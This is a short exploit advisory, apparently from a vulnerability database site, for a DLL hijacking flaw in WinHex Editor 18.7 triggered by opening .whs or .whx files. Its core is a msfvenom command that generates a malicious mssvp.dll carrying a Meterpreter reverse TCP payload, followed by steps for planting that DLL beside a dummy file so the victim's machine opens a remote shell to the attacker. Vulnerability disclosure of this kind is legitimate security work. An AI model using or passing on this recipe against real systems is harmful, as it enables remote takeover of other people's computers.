Winhex Editor 18.7 DLL Hijacking

2016.02.01
Risk: Medium
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

# Exploit Title: WINHEX EDITOR DLL HIJACKING VULNERABILTY # Date: JAN 28 2016 # Exploit Author: SHANTANU KHANDELWAL # Vendor Homepage: www.winhex.com # Software Link: http://www.winhex.com/winhex.zip # Version: <= 18.7 # Tested on: WINDOWS XP 32 bit WinHEX suffers DLL HIJACK Vulnerability from file types .whs and .whx. Vulnerable DLL: mssvp.dll Make Malicious dll : msfvenom -p windows/meterpreter/reverse_tcp -a x86 -f dll LHOST=<HOST IP> LPORT=4444 > mssvp.dll Exploit: Place a dummy .whx or .whs file with the malicious dll . When the fillw is opened in winhex editor you will get shell


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top